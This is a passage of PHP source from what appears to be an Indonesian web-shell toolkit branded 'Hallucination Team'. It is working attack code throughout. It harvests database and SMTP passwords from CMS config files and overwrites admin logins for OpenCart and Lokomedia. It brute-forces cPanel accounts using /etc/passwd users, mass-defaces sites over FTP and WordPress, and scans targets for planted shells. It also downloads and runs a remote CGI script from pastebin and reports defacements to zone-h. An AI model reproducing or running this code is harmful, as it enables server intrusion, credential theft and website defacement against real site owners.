3558.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3559.                     } else {
3560.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
3561.                     }
3562.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3563.                     echo "Config => ".$file_conf."<br>";
3564.                     echo "CMS => OpenCart<br>";
3565.                     echo $url_target;
3566.                     if(!$update OR !$conn OR !$db) {
3567.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3568.                     } else {
3569.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3570.                     }
3571.                     mysql_close($conn);
3572.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
3573.                     $dbhost = ambilkata($config,'server = "','"');
3574.                     $dbuser = ambilkata($config,'username = "','"');
3575.                     $dbpass = ambilkata($config,'password = "','"');
3576.                     $dbname = ambilkata($config,'database = "','"');
3577.                     $prefix = "users";
3578.                     $option = "identitas";
3579.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3580.                     $db = mysql_select_db($dbname);
3581.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
3582.                     $result = mysql_fetch_array($q);
3583.                     $target = $result[alamat_website];
3584.                     if($target == '') {
3585.                         $target2 = $result[url];
3586.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3587.                         if($target2 == '') {
3588.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3589.                         } else {
3590.                             $cek_login3 = file_get_contents("$target2/adminweb/");
3591.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
3592.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
3593.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
3594.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
3595.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
3596.                             } else {
3597.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
3598.                             }
3599.                         }
3600.                     } else {
3601.                         $cek_login = file_get_contents("$target/adminweb/");
3602.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
3603.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
3604.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
3605.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
3606.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
3607.                         } else {
3608.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
3609.                         }
3610.                     }
3611.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
3612.                     echo "Config => ".$file_conf."<br>";
3613.                     echo "CMS => Lokomedia<br>";
3614.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
3615.                         echo $url_target2;
3616.                     } else {
3617.                         echo $url_target;
3618.                     }
3619.                     if(!$update OR !$conn OR !$db) {
3620.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3621.                     } else {
3622.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3623.                     }
3624.                     mysql_close($conn);
3625.                 }
3626.             }
3627.         }
3628.     } else {
3629.         echo "<center>
3630.         <h1>Auto Edit User Config</h1>
3631.         <form method='post'>
3632.         DIR Config: <br>
3633.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3634.         Set User & Pass: <br>
3635.         <input type='text' name='user_baru' value='Hallucination' placeholder='user_baru'><br>
3636.         <input type='text' name='pass_baru' value='Hallucination' placeholder='pass_baru'><br>
3637.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
3638.         </form>
3639.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3640.        
3641. ";
3642.     }
3643. }elseif($_GET['do'] == 'shelscan') {
3644.     echo'<center><h2>Shell Finder</h2>
3645. <form action="" method="post">
3646. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
3647. <br>
3648. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
3649. </form><br>';
3650. if (isset($_POST["scan"])) {  
3651. $url = $_POST['traget'];
3652. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
3653. echo "Result :<br />";
3654. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
3655. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
3656. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
3657. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
3658. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
3659. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
3660. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
3661. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
3662. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
3663. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
3664. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
3665. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
3666. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
3667. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
3668. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
3669. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
3670. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
3671. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
3672. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
3673. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
3674. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
3675. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
3676. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
3677. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
3678. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php",".php","semvak.php","ndasmu.php","bad.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
3679. foreach ($shells as $shell){
3680. $headers = get_headers("$url$shell"); //
3681. if (eregi('200', $headers[0])) {
3682. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
3683. $dz = fopen('shells.txt', 'a+');
3684. $suck = "$url$shell";
3685. fwrite($dz, $suck."\n");
3686. }
3687. }
3688. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
3689. }
3690.    
3691. }
3692.  elseif($_GET['do'] == 'cpanel') {
3693.     if($_POST['crack']) {
3694.         $usercp = explode("\r\n", $_POST['user_cp']);
3695.         $passcp = explode("\r\n", $_POST['pass_cp']);
3696.         $i = 0;
3697.         foreach($usercp as $ucp) {
3698.             foreach($passcp as $pcp) {
3699.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
3700.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3701.                     } else {
3702.                         $_SESSION[$ucp] = "1";
3703.                         $_SESSION[$pcp] = "1";
3704.                         $i++;
3705.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3706.                     }
3707.                 }
3708.             }
3709.         }
3710.         if($i == 0) {
3711.         } else {
3712.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>Hallucination Team</font>";
3713.         }
3714.     } else {
3715.         echo "<center>
3716.         <form method='post'>
3717.         USER: <br>
3718.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3719.         $_usercp = fopen("/etc/passwd","r");
3720.         while($getu = fgets($_usercp)) {
3721.             if($getu == '' || !$_usercp) {
3722.                 echo "<font color=red>Can't read /etc/passwd</font>";
3723.             } else {
3724.                 preg_match_all("/(.*?):x:/", $getu, $u);
3725.                 foreach($u[1] as $user_cp) {
3726.                         if(is_dir("/home/$user_cp/public_html")) {
3727.                             echo "$user_cp\n";
3728.                     }
3729.                 }
3730.             }
3731.         }
3732.         echo "</textarea><br>
3733.         PASS: <br>
3734.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3735.         function cp_pass($dir) {
3736.             $pass = "";
3737.             $dira = scandir($dir);
3738.             foreach($dira as $dirb) {
3739.                 if(!is_file("$dir/$dirb")) continue;
3740.                 $ambil = file_get_contents("$dir/$dirb");
3741.                 if(preg_match("/WordPress/", $ambil)) {
3742.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3743.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3744.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
3745.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3746.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3747.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3748.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
3749.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3750.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3751.                 } elseif(preg_match("/client/", $ambil)) {
3752.                     preg_match("/password=(.*)/", $ambil, $pass1);
3753.                     if(preg_match('/"/', $pass1[1])) {
3754.                         $pass1[1] = str_replace('"', "", $pass1[1]);
3755.                         $pass .= $pass1[1]."\n";
3756.                     }
3757.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3758.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3759.                 }
3760.             }
3761.             echo $pass;
3762.         }
3763.         $cp_pass = cp_pass($dir);
3764.         echo $cp_pass;
3765.         echo "</textarea><br>
3766.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
3767.         </form>
3768.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3769.     }
3770. } elseif($_GET['do'] == 'smtp') {
3771.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
3772.     function scj($dir) {
3773.         $dira = scandir($dir);
3774.         foreach($dira as $dirb) {
3775.             if(!is_file("$dir/$dirb")) continue;
3776.             $ambil = file_get_contents("$dir/$dirb");
3777.             $ambil = str_replace("$", "", $ambil);
3778.             if(preg_match("/JConfig|joomla/", $ambil)) {
3779.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
3780.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
3781.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
3782.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
3783.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
3784.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
3785.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
3786.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
3787.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
3788.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
3789.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
3790.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
3791.             }
3792.         }
3793.     }
3794.     $smpt_hunter = scj($dir);
3795.     echo $smpt_hunter;
3796. } elseif($_GET['do'] == 'auto_wp') {
3797.     if($_POST['hajar']) {
3798.         $title = htmlspecialchars($_POST['new_title']);
3799.         $pn_title = str_replace(" ", "-", $title);
3800.         if($_POST['cek_edit'] == "Y") {
3801.             $script = $_POST['edit_content'];
3802.         } else {
3803.             $script = $title;
3804.         }
3805.         $conf = $_POST['config_dir'];
3806.         $scan_conf = scandir($conf);
3807.         foreach($scan_conf as $file_conf) {
3808.             if(!is_file("$conf/$file_conf")) continue;
3809.             $config = file_get_contents("$conf/$file_conf");
3810.             if(preg_match("/WordPress/", $config)) {
3811.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
3812.                 $dbuser = ambilkata($config,"DB_USER', '","'");
3813.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3814.                 $dbname = ambilkata($config,"DB_NAME', '","'");
3815.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
3816.                 $prefix = $dbprefix."posts";
3817.                 $option = $dbprefix."options";
3818.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3819.                 $db = mysql_select_db($dbname);
3820.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
3821.                 $result = mysql_fetch_array($q);
3822.                 $id = $result[ID];
3823.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3824.                 $result2 = mysql_fetch_array($q2);
3825.                 $target = $result2[option_value];
3826.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
3827.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
3828.                 echo "<div style='margin: 5px auto;'>";
3829.                 if($target == '') {
3830.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
3831.                 } else {
3832.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
3833.                 }
3834.                 if(!$update OR !$conn OR !$db) {
3835.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
3836.                 } else {
3837.                     echo "<font color=lime>sukses di ganti.</font><br>";
3838.                 }
3839.                 echo "</div>";
3840.                 mysql_close($conn);
3841.             }
3842.         }
3843.     } else {
3844.         echo "<center>
3845.         <h1>Auto Edit Title+Content WordPress</h1>
3846.         <form method='post'>
3847.         DIR Config: <br>
3848.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3849.         Set Title: <br>
3850.         <input type='text' name='new_title' value='Hacked By Hallucination' placeholder='New Title'><br><br>
3851.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
3852.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
3853.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
3854.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
3855.         </form>
3856.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3857.         ";
3858.     }
3859. } elseif($_GET['do'] == 'zoneh') {
3860.     if($_POST['submit']) {
3861.         $domain = explode("\r\n", $_POST['url']);
3862.         $nick =  $_POST['nick'];
3863.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
3864.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
3865.         function zoneh($url,$nick) {
3866.             $ch = curl_init("http://www.zone-h.com/notify/single");
3867.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3868.                   curl_setopt($ch, CURLOPT_POST, true);
3869.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
3870.             return curl_exec($ch);
3871.                   curl_close($ch);
3872.         }
3873.         foreach($domain as $url) {
3874.             $zoneh = zoneh($url,$nick);
3875.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
3876.                 echo "$url -> <font color=lime>OK</font><br>";
3877.             } else {
3878.                 echo "$url -> <font color=red>ERROR</font><br>";
3879.             }
3880.         }
3881.     } else {
3882.         echo "<center><form method='post'>
3883.         <u>Defacer</u>: <br>
3884.         <input type='text' name='nick' size='50' value='Hallucination'><br>
3885.         <u>Domains</u>: <br>
3886.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
3887.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
3888.         </form>";
3889.     }
3890.     echo "</center>";
3891. }elseif($_GET['do'] == 'cpftp_auto') {
3892.     if($_POST['crack']) {
3893.         $usercp = explode("\r\n", $_POST['user_cp']);
3894.         $passcp = explode("\r\n", $_POST['pass_cp']);
3895.         $i = 0;
3896.         foreach($usercp as $ucp) {
3897.             foreach($passcp as $pcp) {
3898.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
3899.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3900.                     } else {
3901.                         $_SESSION[$ucp] = "1";
3902.                         $_SESSION[$pcp] = "1";
3903.                         if($ucp == '' || $pcp == '') {
3904.                             //
3905.                         } else {
3906.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3907.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
3908.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
3909.                             if((!$ftp_login) || (!$ftp_conn)) {
3910.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
3911.                             } else {
3912.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
3913.                                 $fi = htmlspecialchars($_POST['file_deface']);
3914.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
3915.                                 if($deface) {
3916.                                     $i++;
3917.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
3918.                                     if(function_exists('posix_getpwuid')) {
3919.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
3920.                                         if($domain_cp == '') {
3921.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3922.                                         } else {
3923.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
3924.                                             foreach($domains_cp[1] as $dj) {
3925.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
3926.                                                 $user_cp_url = $user_cp_url['name'];
3927.                                                 if($user_cp_url == $ucp) {
3928.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
3929.                                                     break;
3930.                                                 }
3931.                                             }
3932.                                         }
3933.                                     } else {
3934.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3935.                                     }
3936.                                 } else {
3937.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
3938.                                 }
3939.                             }
3940.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3941.                         }
3942.                     }
3943.                 }
3944.             }
3945.         }
3946.         if($i == 0) {
3947.         } else {
3948.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Hallucination Team.</font>";
3949.         }
3950.     } else {
3951.         echo "<center>
3952.         <form method='post'>
3953.         Filename: <br>
3954.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
3955.         Deface Page: <br>
3956.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
3957.         USER: <br>
3958.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3959.         $_usercp = fopen("/etc/passwd","r");
3960.         while($getu = fgets($_usercp)) {
3961.             if($getu == '' || !$_usercp) {
3962.                 echo "<font color=red>Can't read /etc/passwd</font>";
3963.             } else {
3964.                 preg_match_all("/(.*?):x:/", $getu, $u);
3965.                 foreach($u[1] as $user_cp) {
3966.                         if(is_dir("/home/$user_cp/public_html")) {
3967.                             echo "$user_cp\n";
3968.                     }
3969.                 }
3970.             }
3971.         }
3972.         echo "</textarea><br>
3973.         PASS: <br>
3974.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3975.         function cp_pass($dir) {
3976.             $pass = "";
3977.             $dira = scandir($dir);
3978.             foreach($dira as $dirb) {
3979.                 if(!is_file("$dir/$dirb")) continue;
3980.                 $ambil = file_get_contents("$dir/$dirb");
3981.                 if(preg_match("/WordPress/", $ambil)) {
3982.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3983.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3984.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
3985.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3986.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3987.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3988.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
3989.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3990.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3991.                 } elseif(preg_match("/client/", $ambil)) {
3992.                     preg_match("/password=(.*)/", $ambil, $pass1);
3993.                     if(preg_match('/"/', $pass1[1])) {
3994.                         $pass1[1] = str_replace('"', "", $pass1[1]);
3995.                         $pass .= $pass1[1]."\n";
3996.                     }
3997.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3998.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3999.                 }
4000.             }
4001.             echo $pass;
4002.         }
4003.         $cp_pass = cp_pass($dir);
4004.         echo $cp_pass;
4005.         echo "</textarea><br>
4006.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
4007.         </form>
4008.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
4009.     }
4010. }
4011.  elseif($_GET['do'] == 'cgi') {
4012.     $cgi_dir = mkdir('idx_cgi', 0755);
4013.     $file_cgi = "idx_cgi/cgi.izo";
4014.     $isi_htcgi = "AddHandler cgi-script .izo";
4015.     $htcgi = fopen(".htaccess", "w");
4016.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
4017.     $cgi = fopen($file_cgi, "w");
4018.     fwrite($cgi, $cgi_script);
4019.     fwrite($htcgi, $isi_htcgi);
4020.     chmod($file_cgi, 0755);
4021.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
4022. } elseif($_GET['do'] == 'fake_root') {
4023.     ob_start();
4024.     function reverse($url) {
4025.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
4026.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
4027.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
4028.               curl_setopt($ch, CURLOPT_HEADER, 0);
4029.               curl_setopt($ch, CURLOPT_POST, 1);
4030.         $resp = curl_exec($ch);
4031.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
4032.         $array = explode(",,", $resp);
4033.         unset($array[0]);
4034.         foreach($array as $lnk) {
4035.             $lnk = "http://$lnk";
4036.             $lnk = str_replace(",", "", $lnk);
4037.             echo $lnk."\n";
4038.             ob_flush();
4039.             flush();
4040.         }
4041.               curl_close($ch);
4042.     }
4043.     function cek($url) {
4044.         $ch = curl_init($url);
4045.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
4046.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
4047.         $resp = curl_exec($ch);
4048.         return $resp;
4049.     }
4050.     $cwd = getcwd();
4051.     $ambil_user = explode("/", $cwd);
4052.     $user = $ambil_user[2];
4053.     if($_POST['reverse']) {
4054.         $site = explode("\r\n", $_POST['url']);
4055.         $file = $_POST['file'];
4056.         foreach($site as $url) {
4057.             $cek = cek("$url/~$user/$file");
4058.             if(preg_match("/hacked/i", $cek)) {
4059.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
4060.             }
4061.         }
4062.     } else {
4063.         echo "<center><form method='post'>
4064.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
4065.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
4066.         Domain: <br>
4067.         <textarea style='width: 450px; height: 250px;' name='url'>";
4068.         reverse($_SERVER['HTTP_HOST']);
4069.         echo "</textarea><br>
4070.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
4071.         </form><br>
4072.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
4073.     }
4074. } elseif($_GET['do'] == 'adminer') {
4075.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
4076.     function adminer($url, $isi) {
4077.         $fp = fopen($isi, "w");
4078.         $ch = curl_init();
4079.               curl_setopt($ch, CURLOPT_URL, $url);
4080.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
4081.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
4082.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
4083.               curl_setopt($ch, CURLOPT_FILE, $fp);
4084.         return curl_exec($ch);
4085.               curl_close($ch);
4086.         fclose($fp);
4087.         ob_flush();
4088.         flush();
4089.     }
4090.     if(file_exists('adminer.php')) {
4091.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
4092.     } else {
4093.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
4094.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
4095.         } else {
4096.             echo "<center><font color=red>gagal buat file adminer</font></center>";
4097.         }
4098.     }
4099. }elseif($_GET['do'] == 'passwbypass') {
4100.     echo '<center>Bypass etc/passw With:<br>
4101. <table style="width:50%">
4102.  <tr>
4103.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
4104.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
4105.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
4106.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
4107.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
4108. </tr></table>Bypass User With : <table style="width:50%">
4109. <tr>
4110.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
4111.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
4112.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
4113.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
4114.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
4115. </tr>
4116. </table><br>';
4117.  
4118. } elseif($_GET['do'] == 'contact') {
4119.     echo "<center><br><font size='6'>--=[ Contact Me ]=--</font><br><br>
4120.     <table><td style='background-color: transparent;text-align:center;border: 2px lime dotted;width:300px;height:250px;'>
4121.     <font color='pink'>Email : Guysforeverid@gmail.com | <a href='https://www.facebook.com/groups/hallucyber/' target='_blank'>Facebook</font><br></tr></td></table></center>";
4122.  
4123.  
4124. if ($_POST['awkuser']) {
4125. echo"<textarea class='inputzbut' cols='65' rows='15'>";
